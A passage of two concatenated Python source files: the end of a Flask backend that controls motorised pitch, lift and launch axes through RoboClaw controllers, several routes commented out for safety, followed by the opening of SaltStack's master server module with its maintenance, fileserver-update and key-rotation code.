rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## if rotation_ready == 0:
## rotation_objective = 0
## else:
## rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
if lift_ready == 0:
lift_objective = 0
else:
lift_objective = int(lift_pulses/(lift_length/lift_ready))
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
@app.route('/app_launch', methods=['POST'])
def function_launch():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
## event.set()
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_break
## launch_actual = launch_connect
## launch_increment = launch_objective-launch_actual
## rc.SpeedAccelDistanceM2(address_2,launch_acceleration,launch_speed_pulses,launch_increment,0)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## event.clear()
## return (''), 204
pass
@app.route('/app_mount', methods=['POST'])
def function_mount():
if encoders_ready == 0: #Not execute if the encoders are not ready
return (''), 403
event.set()
pitch_objective = pitch_pulses
pitch_actual = rc.ReadEncM1(address)[1]
pitch_increment = pitch_objective-pitch_actual
if pitch_increment >= 0:
rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
lift_objective = 0
lift_actual = rc.ReadEncM1(address_2)[1]
lift_increment = lift_objective-lift_actual
if lift_increment >= 0:
rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
else:
rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_mount,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
event.clear()
return (''), 204
# Automatic launch works, but it is disabled becuase the loop while prevents
# the motors to stop when the button Stop is pressed, making it dangerous
##@app.route('/app_automatic_launch', methods=['POST'])
##def function_automatic_launch():
## if encoders_ready == 0: #Not execute if the encoders are not ready
## return (''), 403
##
## #Prepare
## if pitch_ready == 0:
## pitch_objective = 0
## else:
## pitch_objective = int(pitch_pulses/(pitch_length/pitch_ready))
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## if rotation_ready == 0:
## rotation_objective = 0
## else:
## rotation_objective = int(rotation_pulses/(rotation_length/rotation_ready))
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## if lift_ready == 0:
## lift_objective = 0
## else:
## lift_objective = int(lift_pulses/(lift_length/lift_ready))
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_connect,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## buffer_1 = (0,0,0)
## buffer_2 = (0,0,0)
## while(buffer_1[1]!=0x80): #Loop until pitch is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_1[2]!=0x80): #Loop until rotation is completed
## buffer_1 = rc.ReadBuffers(address)
## while(buffer_2[1]!=0x80): #Loop until lift is completed
## buffer_2 = rc.ReadBuffers(address_2)
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Launch
## launch_objective = launch_break
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## rc.SpeedDistanceM2(address_2,launch_speed_pulses,launch_increment,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## while(buffer_2[2]!=0x80): #Loop until launch is completed
## buffer_2 = rc.ReadBuffers(address_2)
## #The loop does not work with AND conditions
## time.sleep(2)
##
## #Standby
## pitch_objective = 0
## pitch_actual = rc.ReadEncM1(address)[1]
## pitch_increment = pitch_objective-pitch_actual
## if pitch_increment >= 0:
## rc.SpeedDistanceM1(address,pitch_speed_pulses,pitch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address,-pitch_speed_pulses,-pitch_increment,1)
## rc.SpeedDistanceM1(address,0,0,0) #To avoid deceleration
##
## rotation_objective = 0
## rotation_actual = rc.ReadEncM2(address)[1]
## rotation_increment = rotation_objective-rotation_actual
## if rotation_increment >= 0:
## rc.SpeedDistanceM2(address,rotation_speed_pulses,rotation_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address,-rotation_speed_pulses,-rotation_increment,1)
## rc.SpeedDistanceM2(address,0,0,0) #To avoid deceleration
##
## lift_objective = 0
## lift_actual = rc.ReadEncM1(address_2)[1]
## lift_increment = lift_objective-lift_actual
## if lift_increment >= 0:
## rc.SpeedDistanceM1(address_2,lift_speed_pulses,lift_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM1(address_2,-lift_speed_pulses,-lift_increment,1)
## rc.SpeedDistanceM1(address_2,0,0,0) #To avoid deceleration
##
## launch_objective = launch_bottom
## launch_actual = rc.ReadEncM2(address_2)[1]
## launch_increment = launch_objective-launch_actual
## if launch_increment >= 0:
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_increment,1) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## else:
## rc.SpeedDistanceM2(address_2,-launch_speed_pulses_slow,-launch_increment,1)
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
## rc.SpeedDistanceM2(address_2,launch_speed_pulses_slow,launch_standby,0) #(address, +-speed, pulses, buffer(0=buffered, 1=Execute immediately))
## rc.SpeedDistanceM2(address_2,0,0,0) #To avoid deceleration
##
## return (''), 204
'''THE FOLLOWING 'ROUTES' HAVE BEEN DE-COMISSIONED FOR THE TIME BEING SO THAT NO VARIABLE INTERACTION CAN BE AMENDED FROM THE GUI'''
##@app.route('/app_change_pitch', methods=['POST'])
##def function_change_pitch():
## pitch_position_prepare = request.form.get('pitch_position_prepare', type=int)
## if pitch_position_prepare > pitch_length or pitch_position_prepare < 0:
## return (''), 400
## global pitch_ready
## pitch_ready = float(pitch_position_prepare)
## return (''), 204
##
##@app.route('/app_change_lift', methods=['POST'])
##def function_change_lift():
## lift_position_prepare = request.form.get('lift_position_prepare', type=int)
## if lift_position_prepare > lift_length or lift_position_prepare < 0:
## return (''), 400
## global lift_ready
## lift_ready = float(lift_position_prepare)
## return (''), 204
##
##@app.route('/app_change_rotation', methods=['POST'])
##def function_change_rotation():
## rotation_position_prepare = request.form.get('rotation_position_prepare', type=int)
## if rotation_position_prepare > rotation_length or rotation_position_prepare < 0:
## return (''), 400
## global rotation_ready
## rotation_ready = float(rotation_position_prepare)
## return (''), 204
##
##@app.route('/app_change_speed', methods=['POST'])
##def function_change_speed():
## speed = request.form.get('speed', type=int)
## if speed > launch_max_speed or speed < launch_min_speed:
## return (''), 400
## global launch_speed_pulses
## global launch_acceleration
## if speed > 7:
## launch_speed_pulses = speed*13400
## launch_acceleration = 655360 #Maximum value
## return (''), 204
## else:
## launch_speed_pulses = speed*13400
## launch_acceleration = (launch_speed_pulses**2)/13400
## return (''), 204
##
##@app.route('/app_change_acceleration', methods=['POST'])
##def function_change_acceleration():
## acceleration = request.form.get('acceleration', type=int)
## if acceleration > launch_max_acceleration or acceleration < launch_min_acceleration:
## return (''), 400
## acceleration = acceleration*13400
## global launch_acceleration
## launch_acceleration = acceleration
## return (''), 204
@app.route('/app_disable_buttons', methods=['POST'])
def function_disable_buttons():
return jsonify(encoders_ready=encoders_ready)
# Testing having the lights and temperature as a part of the backend code
parser = argparse.ArgumentParser()
parser.add_argument('-c', '--clear', action='store_true', help='clear the display on exit')
args = parser.parse_args()
try:
strip.begin()
except RuntimeError:
print("ws2811_init failed with code -5 (mmap() failed)")
try:
colorWipe(strip, Color(255, 255, 255))
except NameError:
print("'strip is not defined'")
##print ('STANDBY MODE')
#For starting the thread when booting
event = Event()
Thread(target=relay_activate).start()
if __name__ == "__main__":
try:
app.run('localhost',port=5000, debug=False)
except KeyboardInterrupt:
if args.clear:
colorWipe(strip, Color(0, 0, 0), 10)
|
master.py
|
# -*- coding: utf-8 -*-
'''
This module contains all of the routines needed to set up a master server, this
involves preparing the three listeners and the workers needed by the master.
'''
# Import python libs
from __future__ import absolute_import, with_statement, print_function, unicode_literals
import copy
import ctypes
import functools
import os
import re
import sys
import time
import errno
import signal
import stat
import logging
import collections
import multiprocessing
import threading
import salt.serializers.msgpack
# pylint: disable=import-error,no-name-in-module,redefined-builtin
from salt.ext import six
from salt.ext.six.moves import range
from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO
# pylint: enable=import-error,no-name-in-module,redefined-builtin
import tornado.gen # pylint: disable=F0401
# Import salt libs
import salt.crypt
import salt.client
import salt.client.ssh.client
import salt.exceptions
import salt.payload
import salt.pillar
import salt.state
import salt.runner
import salt.auth
import salt.wheel
import salt.minion
import salt.key
import salt.acl
import salt.engines
import salt.daemons.masterapi
import salt.defaults.exitcodes
import salt.transport.server
import salt.log.setup
import salt.utils.args
import salt.utils.atomicfile
import salt.utils.crypt
import salt.utils.event
import salt.utils.files
import salt.utils.gitfs
import salt.utils.gzip_util
import salt.utils.jid
import salt.utils.job
import salt.utils.master
import salt.utils.minions
import salt.utils.platform
import salt.utils.process
import salt.utils.schedule
import salt.utils.ssdp
import salt.utils.stringutils
import salt.utils.user
import salt.utils.verify
import salt.utils.zeromq
from salt.config import DEFAULT_INTERVAL
from salt.defaults import DEFAULT_TARGET_DELIM
from salt.transport import iter_transport_opts
from salt.utils.debug import (
enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack
)
from salt.utils.event import tagify
from salt.utils.odict import OrderedDict
try:
import resource
HAS_RESOURCE = True
except ImportError:
# resource is not available on windows
HAS_RESOURCE = False
# Import halite libs
try:
import halite # pylint: disable=import-error
HAS_HALITE = True
except ImportError:
HAS_HALITE = False
from tornado.stack_context import StackContext
from salt.utils.ctx import RequestContext
log = logging.getLogger(__name__)
class SMaster(object):
'''
Create a simple salt-master, this will generate the top-level master
'''
secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION}
def __init__(self, opts):
'''
Create a salt master server instance
:param dict opts: The salt options dictionary
'''
self.opts = opts
self.master_key = salt.crypt.MasterKeys(self.opts)
self.key = self.__prep_key()
# We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'.
# Otherwise, 'SMaster.secrets' won't be copied over to the spawned process
# on Windows since spawning processes on Windows requires pickling.
# These methods are only used when pickling so will not be used on
# non-Windows platforms.
def __setstate__(self, state):
self.opts = state['opts']
self.master_key = state['master_key']
self.key = state['key']
SMaster.secrets = state['secrets']
def __getstate__(self):
return {'opts': self.opts,
'master_key': self.master_key,
'key': self.key,
'secrets': SMaster.secrets}
def __prep_key(self):
'''
A key needs to be placed in the filesystem with permissions 0400 so
clients are required to run as root.
'''
return salt.daemons.masterapi.access_keys(self.opts)
class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A generalized maintenance process which performs maintenance routines.
'''
def __init__(self, opts, **kwargs):
'''
Create a maintenance instance
:param dict opts: The salt options
'''
super(Maintenance, self).__init__(**kwargs)
self.opts = opts
# How often do we perform the maintenance tasks
self.loop_interval = int(self.opts['loop_interval'])
# Track key rotation intervals
self.rotate = int(time.time())
# A serializer for general maint operations
self.serial = salt.payload.Serial(self.opts)
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
log_queue_level=state['log_queue_level']
)
def __getstate__(self):
return {
'opts': self.opts,
'log_queue': self.log_queue,
'log_queue_level': self.log_queue_level
}
def _post_fork_init(self):
'''
Some things need to be init'd after the fork has completed
The easiest example is that one of these module types creates a thread
in the parent process, then once the fork happens you'll start getting
errors like "WARNING: Mixing fork() and threads detected; memory leaked."
'''
# Load Runners
ropts = dict(self.opts)
ropts['quiet'] = True
runner_client = salt.runner.RunnerClient(ropts)
# Load Returners
self.returners = salt.loader.returners(self.opts, {})
# Init Scheduler
self.schedule = salt.utils.schedule.Schedule(self.opts,
runner_client.functions_dict(),
returners=self.returners)
self.ckminions = salt.utils.minions.CkMinions(self.opts)
# Make Event bus for firing
self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False)
# Init any values needed by the git ext pillar
self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts)
self.presence_events = False
if self.opts.get('presence_events', False):
tcp_only = True
for transport, _ in iter_transport_opts(self.opts):
if transport != 'tcp':
tcp_only = False
if not tcp_only:
# For a TCP only transport, the presence events will be
# handled in the transport code.
self.presence_events = True
def run(self):
'''
This is the general passive maintenance process controller for the Salt
master.
This is where any data that needs to be cleanly maintained from the
master is maintained.
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# init things that need to be done after the process is forked
self._post_fork_init()
# Make Start Times
last = int(time.time())
old_present = set()
while True:
now = int(time.time())
if (now - last) >= self.loop_interval:
salt.daemons.masterapi.clean_old_jobs(self.opts)
salt.daemons.masterapi.clean_expired_tokens(self.opts)
salt.daemons.masterapi.clean_pub_auth(self.opts)
self.handle_git_pillar()
self.handle_schedule()
self.handle_key_cache()
self.handle_presence(old_present)
self.handle_key_rotate(now)
salt.utils.verify.check_max_open_files(self.opts)
last = now
time.sleep(self.loop_interval)
def handle_key_cache(self):
'''
Evaluate accepted keys and create a msgpack file
which contains a list
'''
if self.opts['key_cache'] == 'sched':
keys = []
#TODO DRY from CKMinions
if self.opts['transport'] in ('zeromq', 'tcp'):
acc = 'minions'
else:
acc = 'accepted'
for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)):
if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)):
keys.append(fn_)
log.debug('Writing master key cache')
# Write a temporary file securely
with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file:
self.serial.dump(keys, cache_file)
def handle_key_rotate(self, now):
'''
Rotate the AES key rotation
'''
to_rotate = False
dfn = os.path.join(self.opts['cachedir'], '.dfn')
try:
stats = os.stat(dfn)
# Basic Windows permissions don't distinguish between
# user/group/all. Check for read-only state instead.
if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK):
to_rotate = True
# Cannot delete read-only files on Windows.
os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR)
elif stats.st_mode == 0o100400:
to_rotate = True
else:
log.error('Found dropfile with incorrect permissions, ignoring...')
os.remove(dfn)
except os.error:
pass
if self.opts.get('publish_session'):
if now - self.rotate >= self.opts['publish_session']:
to_rotate = True
if to_rotate:
log.info('Rotating master AES key')
for secret_key, secret_map in six.iteritems(SMaster.secrets):
# should be unnecessary-- since no one else should be modifying
with secret_map['secret'].get_lock():
secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']())
self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key')
self.rotate = now
if self.opts.get('ping_on_rotate'):
# Ping all minions to get them to pick up the new key
log.debug('Pinging all connected minions '
'due to key rotation')
salt.utils.master.ping_all_connected_minions(self.opts)
def handle_git_pillar(self):
'''
Update git pillar
'''
try:
for pillar in self.git_pillar:
pillar.fetch_remotes()
except Exception as exc:
log.error('Exception caught while updating git_pillar',
exc_info=True)
def handle_schedule(self):
'''
Evaluate the scheduler
'''
try:
self.schedule.eval()
# Check if scheduler requires lower loop interval than
# the loop_interval setting
if self.schedule.loop_interval < self.loop_interval:
self.loop_interval = self.schedule.loop_interval
except Exception as exc:
log.error('Exception %s occurred in scheduled job', exc)
def handle_presence(self, old_present):
'''
Fire presence events if enabled
'''
if self.presence_events:
present = self.ckminions.connected_ids()
new = present.difference(old_present)
lost = old_present.difference(present)
if new or lost:
# Fire new minions present event
data = {'new': list(new),
'lost': list(lost)}
self.event.fire_event(data, tagify('change', 'presence'))
data = {'present': list(present)}
# On the first run it may need more time for the EventPublisher
# to come up and be ready. Set the timeout to account for this.
self.event.fire_event(data, tagify('present', 'presence'), timeout=3)
old_present.clear()
old_present.update(present)
class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess):
'''
A process from which to update any dynamic fileserver backends
'''
def __init__(self, opts, **kwargs):
super(FileserverUpdate, self).__init__(**kwargs)
self.opts = opts
self.update_threads = {}
# Avoid circular import
import salt.fileserver
self.fileserver = salt.fileserver.Fileserver(self.opts)
self.fill_buckets()
# __setstate__ and __getstate__ are only used on Windows.
# We do this so that __init__ will be invoked on Windows in the child
# process so that a register_after_fork() equivalent will work on Windows.
def __setstate__(self, state):
self._is_child = True
self.__init__(
state['opts'],
log_queue=state['log_queue'],
)
def __getstate__(self):
return {'opts': self.opts,
'log_queue': self.log_queue,
}
def fill_buckets(self):
'''
Get the configured backends and the intervals for any backend which
supports them, and set up the update "buckets". There will be one
bucket for each thing being updated at a given interval.
'''
update_intervals = self.fileserver.update_intervals()
self.buckets = {}
for backend in self.fileserver.backends():
fstr = '{0}.update'.format(backend)
try:
update_func = self.fileserver.servers[fstr]
except KeyError:
log.debug(
'No update function for the %s filserver backend',
backend
)
continue
if backend in update_intervals:
# Variable intervals are supported for this backend
for id_, interval in six.iteritems(update_intervals[backend]):
if not interval:
# Don't allow an interval of 0
interval = DEFAULT_INTERVAL
log.debug(
'An update_interval of 0 is not supported, '
'falling back to %s', interval
)
i_ptr = self.buckets.setdefault(interval, OrderedDict())
# Backend doesn't technically need to be present in the
# key, all we *really* need is the function reference, but
# having it there makes it easier to provide meaningful
# debug logging in the update threads.
i_ptr.setdefault((backend, update_func), []).append(id_)
else:
# Variable intervals are not supported for this backend, so
# fall back to the global interval for that fileserver. Since
# this backend doesn't support variable updates, we have
# nothing to pass to the backend's update func, so we'll just
# set the value to None.
try:
interval_key = '{0}_update_interval'.format(backend)
interval = self.opts[interval_key]
except KeyError:
interval = DEFAULT_INTERVAL
log.warning(
'%s key missing from configuration. Falling back to '
'default interval of %d seconds',
interval_key, interval
)
self.buckets.setdefault(
interval, OrderedDict())[(backend, update_func)] = None
def update_fileserver(self, interval, backends):
'''
Threading target which handles all updates for a given wait interval
'''
def _do_update():
log.debug(
'Performing fileserver updates for items with an update '
'interval of %d', interval
)
for backend, update_args in six.iteritems(backends):
backend_name, update_func = backend
try:
if update_args:
log.debug(
'Updating %s fileserver cache for the following '
'targets: %s', backend_name, update_args
)
args = (update_args,)
else:
log.debug('Updating %s fileserver cache', backend_name)
args = ()
update_func(*args)
except Exception as exc:
log.exception(
'Uncaught exception while updating %s fileserver '
'cache', backend_name
)
log.debug(
'Completed fileserver updates for items with an update '
'interval of %d, waiting %d seconds', interval, interval
)
condition = threading.Condition()
_do_update()
while True:
with condition:
condition.wait(interval)
_do_update()
def run(self):
'''
Start the update threads
'''
salt.utils.process.appendproctitle(self.__class__.__name__)
# Clean out the fileserver backend cache
salt.daemons.masterapi.clean_fsbackend(self.opts)
for interval in self.buckets:
self.update_threads[interval] = threading.Thread(
target=self.update_fileserver,
args=(interval, self.buckets[interval]),
)
self.update_threads[interval].start()
# Keep the process alive
while True:
time.sleep(60)
class Master(SMaster):
'''
The salt master server
'''
def __init__(self, opts):
'''
Create a salt master server instance
:param dict: The salt options
'''
if zmq and ZMQ_VERSION_INFO < (3, 2):
log.warning(
'You have a version of ZMQ less than ZMQ 3.2! There are '
'known connection keep-alive issues with ZMQ < 3.2 which '
'may result in loss of contact with minions. Please '
'upgrade your ZMQ!'
)
SMaster.__init__(self, opts)
def __set_max_open_files(self):
if not HAS_RESOURCE:
return
# Let's check to see how our max open files(ulimit -n) setting is
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
if mof_h == resource.RLIM_INFINITY:
# Unclear what to do with infinity... macOS reports RLIM_INFINITY as
# hard limit,but raising to anything above soft limit fails...
mof_h = mof_s
log.info(
'Current values for max open files soft/hard setting: %s/%s',
mof_s, mof_h
)
# Let's grab, from the configuration file, the value to raise max open
# files to
mof_c = self.opts['max_open_files']
if mof_c > mof_h:
# The configured value is higher than what's allowed
log.info(
'The value for the \'max_open_files\' setting, %s, is higher '
'than the highest value the user running salt is allowed to '
'set (%s). Defaulting to %s.', mof_c, mof_h, mof_h
)
mof_c = mof_h
if mof_s < mof_c:
# There's room to raise the value. Raise it!
log.info('Raising max open files value to %s', mof_c)
resource.setrlimit(resource.RLIMIT_NOFILE, (mof_c, mof_h))
try:
mof_s, mof_h = resource.getrlimit(resource.RLIMIT_NOFILE)
log.info(
'New values for max open files soft/hard values: %s/%s',
mof_s, mof_h
)
except ValueError:
# https://github.com/saltstack/salt/issues/1991#issuecomment-13025595
# A user under macOS reported that our 100000 default value is
# still too high.
log.critical(
'Failed to raise max open files setting to %s. If this '
'value is too low, the salt-master will most likely fail '
'to run properly.', mof_c
)
def _pre_flight(self):
'''
Run pre flight checks. If anything in this method fails then the master
should not start up.
'''
errors = []
critical_errors = []
try:
os.chdir('/')
except OSError as err:
errors.append(
'Cannot change to root directory ({0})'.format(err)
)
if self.opts.get('fileserver_verify_config', True):
# Avoid circular import
import salt.fileserver
fileserver = salt.fileserver.Fileserver(self.opts)
if not fileserver.servers:
errors.append(
'Failed to load fileserver backends, the configured backends '
'are: {0}'.format(', '.join(self.opts['fileserver_backend']))
)
else:
# Run init() for all backends which support the function, to
# double-check configuration
try:
fileserver.init()
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append('{0}'.format(exc))
if not self.opts['fileserver_backend']:
errors.append('No fileserver backends are configured')
# Check to see if we need to create a pillar cache dir
if self.opts['pillar_cache'] and not os.path.isdir(os.path.join(self.opts['cachedir'], 'pillar_cache')):
try:
with salt.utils.files.set_umask(0o077):
os.mkdir(os.path.join(self.opts['cachedir'], 'pillar_cache'))
except OSError:
pass
if self.opts.get('git_pillar_verify_config', True):
try:
git_pillars = [
x for x in self.opts.get('ext_pillar', [])
if 'git' in x
and not isinstance(x['git'], six.string_types)
]
except TypeError:
git_pillars = []
critical_errors.append(
'Invalid ext_pillar configuration. It is likely that the '
'external pillar type was not specified for one or more '
'external pillars.'
)
if git_pillars:
try:
new_opts = copy.deepcopy(self.opts)
import salt.pillar.git_pillar
for repo in git_pillars:
new_opts['ext_pillar'] = [repo]
try:
git_pillar = salt.utils.gitfs.GitPillar(
new_opts,
repo['git'],
per_remote_overrides=salt.pillar.git_pillar.PER_REMOTE_OVERRIDES,
per_remote_only=salt.pillar.git_pillar.PER_REMOTE_ONLY,
global_only=salt.pillar.git_pillar.GLOBAL_ONLY)
except salt.exceptions.FileserverConfigError as exc:
critical_errors.append(exc.strerror)
finally:
del new_opts
if errors or critical_errors:
for error in errors:
log.error(error)
for error in critical_errors:
log.critical(error)
log.critical('Master failed pre flight checks, exiting\n')
sys.exit(salt.defaults.exitcodes.EX_GENERIC)
def start(self):
'''
Turn on the master server components
'''
self._pre_flight()
log.info('salt-master is starting as user \'%s\'', salt.utils.user.get_user())
enable_sigusr1_handler()
enable_sigusr2_handler()
self.__set_max_open_files()
# Reset signals to default ones before adding processes to the process
# manager. We don't want the processes being started to inherit those
# signal handlers
with salt.utils.process.default_signals(signal.SIGINT, signal.SIGTERM):
# Setup the secrets here because the PubServerChannel may need
# them as well.
SMaster.secrets['aes'] = {
'secret': multiprocessing.Array(
ctypes.c_char,
salt.utils.stringutils.to_bytes(
salt.crypt.Crypticle.generate_key_string()
)
),
'reload': salt.crypt.Crypticle.generate_key_string
}
log.info('Creating master process manager')
# Since there are children having their own ProcessManager we should wait for kill more time.
